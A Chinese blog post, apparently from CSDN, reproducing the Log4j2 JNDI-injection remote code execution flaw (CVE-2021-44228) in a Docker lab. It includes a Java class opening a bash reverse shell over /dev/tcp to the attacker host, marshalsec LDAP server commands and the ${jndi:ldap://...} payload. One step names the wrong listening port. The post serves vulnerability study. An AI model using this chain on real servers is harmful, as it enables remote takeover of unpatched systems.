Apache log4j2 RCE(CVE-2021-44228)

已于 2022-07-16 15:51:38 修改
阅读量533 收藏 1
点赞数 1
分类专栏: 漏洞复现
于 2022-07-16 15:50:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44842234/article/details/125820678
版权

Apache Log4j2 远程代码执行 JNDI注入 漏洞复现 安全防护
关键词由CSDN通过智能技术生成

 

Apache log4j2 远程代码执行漏洞

 

0x00 漏洞原理

Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。该日志框架被大量用于业务系统开发,用来记录日志信息。

Log4j2中存在JNDI注入漏洞,当程序将用户输入的数据被日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。
 
 

0x01 影响版本

Apache Log4j 2.x <= 2.14.1 <= Log4j 2.15.0-rc1

 

0x02 环境搭建

marshalsec-0.0.3-SNAPSHOT-all.jar
链接:https://pan.baidu.com/s/1XnpVW9QluzAB5qmqrynSQg
提取码:tv8a

192.168.68.68  #靶机
192.168.68.168 #攻击机/接收shell反弹

docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln
docker run -it -d -p 8080:8080 --name log4j2 registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln 
docker exec -it log4j2 /bin/bash
/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh

靶机执行如下命令:

docker pull registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln

请添加图片描述
 
 

docker run -it -d -p 8080:8080 --name log4j2 registry.cn-hangzhou.aliyuncs.com/fengxuan/log4j_vuln

请添加图片描述
 
 

docker exec -it log4j2 /bin/bash

请添加图片描述
 
 

/bin/bash /home/apache-tomcat-8.5.45/bin/startup.sh

请添加图片描述
 
 

http://192.168.86.86:8080/webstudy/hello-fengxuan  #环境搭建完毕,尝试访问主页

请添加图片描述
 
 

0x03 漏洞复现(log4j2反弹shell)
 1.攻击机(192.168.68.168)新建一个Exploit.java,并编译成class文件
注:本次测试使用java的版本为1.8,java版本会影响后续测试是否成功

//javac Exploit.java
public class Exploit {
   public Exploit(){
       try{
           // 要执行的命令
           String[] commands = {"bash","-c","exec 5<>/dev/tcp/192.168.68.168/12345;cat <&5 | while read line; do $line 2>&5 >&5; done"};
           Process pc = Runtime.getRuntime().exec(commands);
           pc.waitFor();
      } catch(Exception e){
           e.printStackTrace();
      }
  }

   public static void main(String[] argv) {
       Exploit e = new Exploit();
  }
}

请添加图片描述
 
 

2.攻击机(192.168.68.168)开启一个python服务,监听888端口:
python3 -m http.server 888

请添加图片描述
 
 

3.攻击机(192.168.68.168)借助marshalsec项目,启动一个LDAP服务器, 将web服务器端口888映射为1234 
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.68.168:888/#Exploit" 1234

请添加图片描述
 
 

4.攻击机开始监听12345端口(因为Exploit反弹shelll到攻击机的12345端口)

请添加图片描述
 
 

5.访问靶机,并将payload发送给靶机,注意需要将GET方法改为POST
c=${jndi:ldap://192.168.68.168:1234/Exploit}

请添加图片描述 
 

6.靶机成功访问了攻击机开启的web服务,并下载了Exploit.class恶意文件

请添加图片描述
 
 

7.使用marshalsec工具快捷的开启rmi服务,借助rmi服务将rmi reference result 成功重定向到web服务器

请添加图片描述
 
 

8.攻击机监听的6666端口成功收到反弹过来的shell

请添加图片描述
 
 
 
 

参考链接
https://cloud.tencent.com/developer/article/1921530
https://www.cnblogs.com/peace-and-romance/p/15717457.html

TheK4
关注
专栏目录
Log4j CVE-2021-44228 漏洞及Spring Boot解决方案
oscar999的专栏
12-17 2136
Log4j 的2 到 2.14 版本最近爆出了一个比较大的漏洞,漏洞编号是CVE-2021-44228。本篇对该漏洞进行简单介绍, 并介绍Spring Boot项目如何解决该漏洞。
log4j2 CVE-2021-44228漏洞复现
qq_14902381的博客
08-10 793
vulfocus靶场log4j2 漏洞CVE-2021-44228复现
logging-log4j2, Apache日志记录Log4J2镜像.zip
10-10
logging-log4j2, Apache日志记录Log4J2镜像 Apache Log4J 2Apache是对 Log4J的升级,它提供了比它的前辈 Log4J 1. x,的显著改进,并提供了许多改进,同时解决了soa架构中一些固有问题。 在Github上请求请求通过发送请求请求,你可
Log4j 学习笔记
honglei225的专栏
10-02 1332
  让每个类都拥有一个private static的Logger对象,用来输出该类中的全部日志信息 使用xml文件来完成对log4j环境的配置。在项目的main class中的静态初始化块里放log4j环境的配置代码。注意:在一个项目中,log4j环境只需要被配置一次,而不是在每个使用了logger的类里都需要调用一次 用MyClass.class作为参数创建该类的静态Logger对象--学习Aj
Log4j2—漏洞分析(CVE-2021-44228)
最新发布
本散修的一些学习心得与笔记,道友请自便。
09-19 1424
深入理解Log4j2漏洞&&总结与思考
Apache Log4j详解
cuker919的专栏
01-06 1435
Apache Logging Project Homepage: http://logging.apache.org/ Log4j的类图  [list=]Logger - 日志写出器,供程序员输出日志信息 Appender - 日志目的地,把格式化好的日志信息输出到指定的地方去 ConsoleAppender - 目的地为控制台的Appender FileAppender - 目的地为文件的App
Apache Log4j2详解
热门推荐
ThinkWon的博客
07-08 1万+
在项目开发中,都不可避免的使用到日志。没有日志虽然不会影响项目的正确运行,但是没有日志的项目可以说是不完整的。日志在调试,错误或者异常定位,数据分析中的作用是不言而喻的。 日志作用 调试 在Java项目调试时,查看栈信息可以方便地知道当前程序的运行状态,输出的日志便于记录程序在之前的运行结果。如果你大量使用System.out或者System.err,这是一种最方便最有效的方法,但显得不够专业。 ...
Apache Log4j2 RCE(CVE-2021-44228)
weixin_60329395的博客
11-12 1379
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将**用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的数据请求包,最终触发远程代码执行(RCE)
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍
m0_54899775的博客
12-13 2398
Apache Log4j2(CVE-2021-44228) 高危安全漏洞介绍 史诗级漏洞
Apache Log4j2-RCE-CVE-2021-44228
Have_a_great_day的博客
05-28 368
Apache Log4j通过定义每一条日志信息的级别能够更加细致地控制日志生成地过程,受影响地版本中纯在JNDI注入漏洞,导致日志在记录用户输入地数据时,触发了注入漏洞,该漏洞可导致远程代码执行。将构造的rmi和ldap按次放入 jndi: 后。ldap是协议,后面的地址为dns地址。使用JNDIExploit进行漏洞利用。​ log4j支持JNDI协议。访问如下url,查看dns回显。监听成功,拿到了管理员权限。可以看到发生了dns回显。进行base64编码。
log4j2-rce漏洞复现(CVE-2021-44228)
Z_l123的博客
04-01 2247
漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j2 2.0-beta9 - 2.15.0(不包括安全版本 2.12.2、2.12.3 和 2.3.1) 漏洞编号:CVE-2021-44228 漏洞复现 利用vulfocus搭建并启动靶场 DNSLog验证 通过DNSLog Platform平台获取到域名skvgq7.dnslog.cn,构造payload:${jndi
Log4j2-RCE
xlsj雪松的博客
12-26 3130
1 Log4j2漏洞官方描述 Apache Log4j2 版本 2.0-alpha1 到 2.16.0(不包括 2.12.3)没有防止自引用查找的不受控制的递归。当日志配置使用带有上下文查找的非默认模式布局(例如,$${ctx:loginId})时,控制线程上下文映射 (MDC) 输入数据的攻击者可以制作包含递归查找的恶意输入数据,导致 StackOverflowError 将终止进程。这也称为 DOS(拒绝服务)攻击。 Log4j 2.x 缓解措施 升级到 Log4j 2.3.1(适用于 Java
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Apache log4j是领先的日志记录框架
最佳 Java 编程
05-17 160
根据 从零周转开始的调查中, Apache log4j是领先的Java日志记录框架。 这实际上是一个非常有趣的调查。 它显示SLF4J最常用作伐木外墙,占61%。 但是,它似乎最常与Apache Log4j一起使用,52%的调查参与者都使用了它。 只有29%的人使用logback,只有7%的JDK Logging。 相同数量的人编写自己的框架。 虽然报告说“ Logback”是“...
Apache Log4j2日志配置
bangwu6488的博客
11-06 411
一、Log4j概念   Log4j是一款可以记录测试日志的开源项目。通过调用其API记录日志信息,可以让我们在执行用例时不必守在电脑面前等待结果,仅需在用例执行完成后,通过Log4j收集到的代码执行信息查看执行结果,以调试程序。   它主要由3个部分组成:     1) Logger:Logger类帮助记录不同日志级别的信息:trace < debug < info &...
Apache Log4j简介
wc_stone
10-23 1354
[size=18][b]log4j-调试好帮手[/b][/size] [color=olive]1 log的作用 [/color] 尽管已经涌现出了不少调试应用程序的手段,直接把信息输出到屏幕(或者其他地方)仍然是非常重要的手段,有时甚至是唯一可以利用的方法,尤其在调试分布式应用程序时,比如基于WEB的应用程序。相信大家对WEB应用程序的调试难度都有所体会。 [color=...
log4j2 rce (CVE-2021-44228)
weixin_40151476的博客
03-01 962
Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置,经阿里云安全团队验证Apache Struts2、Apache Solr、Apache Druid、Apache Flink等均受影响。
Apache Log4j2 核弹级漏洞
qq_37300107的博客
12-16 2457
近日,Apache Log4j2远程代码执行漏洞刷爆朋友圈,该漏洞一旦被攻击者利用会造成严重危害。而且此次漏洞影响巨大,很多网站如百度等都是此次 Log4j 远程代码执行漏洞的受害者,很多互联网企业也都连夜做了应急措施。 漏洞详情: Apache Log4j 远程代码执行漏洞 严重程度: 严重 由于Apache Log4j2某些功能存在递归解析功能,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置 漏洞情况分析: Apache Log4j是一个基于Java的日志记录组件.
Apache log4j2漏洞
m0_63645854的博客
06-13 622
本文介绍了log4j2远程代码执行漏洞
Apache Log4j2远程代码执行漏洞)
F2444790591的博客
07-08 8050
1、下载、解压、重命名vulhub-master.zip为vulhub 2、进入漏洞环境下,启动该环境。 3、访问目标靶场: 4、在Dnslog.cn中生成接收信息的域名 。 5、提交dnslog payload 参数,进行访问。 6、可以发现dnslog接收到返回的信息,证明存在log4
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值